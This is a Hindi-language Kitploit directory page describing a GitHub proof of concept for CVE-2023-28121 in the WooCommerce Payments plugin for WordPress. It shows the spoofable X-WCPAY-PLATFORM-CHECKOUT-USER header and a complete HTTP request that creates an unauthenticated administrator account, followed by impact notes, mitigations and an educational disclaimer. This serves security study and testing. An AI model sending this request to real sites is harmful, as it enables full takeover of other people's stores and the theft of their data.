Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-28121-WordPress-Privilege-Escalation — वर्डप्रेस में वूकॉमर्स पेमेंट्स प्लगइन का उपयोग करके एक गंभीर कमजोरी का व्यावहारिक शोषण। | Kitploit
उपकरण/GitHubGitHub/luisdevpentest/cve-2023-28121-wordpress-privilege-escalation
प्रमाणीकरण और प्राधिकरणविशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubluisdevpentest/cve-2023-28121-wordpress-privilege-escalation

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-28121-WordPress-Privilege-Escalation

वर्डप्रेस में वूकॉमर्स पेमेंट्स प्लगइन का उपयोग करके एक गंभीर कमजोरी का व्यावहारिक शोषण।

रिपॉजिटरी देखें
114 महीने पहलेअभी तक समीक्षित नहीं

🔐 CVE-2023-28121 — वर्डप्रेस विशेषाधिकार वृद्धि

वर्डप्रेस में WooCommerce Payments प्लगइन का उपयोग करके महत्वपूर्ण कमजोरी का व्यावहारिक शोषण।


📌 सारांश

CVE-2023-28121 REST API के माध्यम से बिना प्रमाणीकरण के व्यवस्थापक उपयोगकर्ता बनाने की अनुमति देता है।

  • गंभीरता: गंभीर (CVSS 9.8)
  • प्रभाव: साइट का पूर्ण नियंत्रण
  • प्रकार: प्रमाणीकरण बायपास / विशेषाधिकार वृद्धि
  • +600.000 सक्रिय स्थापनाएँ - मार्च 2023 https://www.wiz.io/vulnerability-database/cve/cve-2023-28121?utm_source=chatgpt.com

📊 प्रभावित प्लगइन में सैकड़ों हजारों स्थापनाएँ हैं, और इसका व्यापक रूप से ई-कॉमर्स में उपयोग किया जाता है।


🎥 प्रदर्शन

https://github.com/user-attachments/assets/cead3884-0924-4320-967f-de9fb3f6cd44


⚠️ यह कैसे काम करता है

सिस्टम एक हेरफेर करने योग्य हेडर स्वीकार करता है:

root@kitploit:~
X-WCPAY-PLATFORM-CHECKOUT-USER: 1

इसके साथ, बिना वैध प्रमाणीकरण के उच्च विशेषाधिकारों वाला उपयोगकर्ता बनाने के लिए एक अनुरोध भेजना संभव है।


🧪 PoC

root@kitploit:~
POST /wp-json/wp/v2/users
Content-Type: application/json
X-WCPAY-PLATFORM-CHECKOUT-USER: 1

{
  "username": "hacked",
  "password": "StrongPass123!",
  "email": "[email protected]",
  "roles": ["administrator"]
}

✔️ परिणाम: व्यवस्थापक उपयोगकर्ता का निर्माण


🔥 प्रभाव

  • व्यवस्थापक का निर्माण
  • पैनल /wp-admin तक पहुँच
  • संभावित पूर्ण अधिग्रहण
  • धोखाधड़ी और डेटा रिसाव का जोखिम

🛠️ शमन

  • प्लगइन को सही संस्करण में अपडेट करें
  • REST API तक पहुँच प्रतिबंधित करें
  • प्रमाणीकरण को सही ढंग से मान्य करें

🧱 वातावरण

  • वर्डप्रेस (स्थानीय प्रयोगशाला)
  • WooCommerce Payments (कमजोर संस्करण)

📚 संदर्भ

  • CVE-2023-28121
  • वर्डप्रेस REST API दस्तावेज़ीकरण
  • https://www.rcesecurity.com/2023/07/patch-diffing-cve-2023-28121-to-compromise-a-woocommerce/

👨‍💻 लेखक

Luis Eduardo .M.B.S.R

पेंटेस्टर / वेब सुरक्षा

LinkedIn: https://www.linkedin.com/in/luis-eduardo-ti/

GitHub: https://github.com/luisdevpentest

⚖️ अस्वीकरण

नियंत्रित वातावरण में शैक्षिक उपयोग। तीसरे पक्ष द्वारा ऐसे ज्ञान के उपयोग के लिए मैं जिम्मेदार नहीं हूँ।

टूल डाउनलोड करें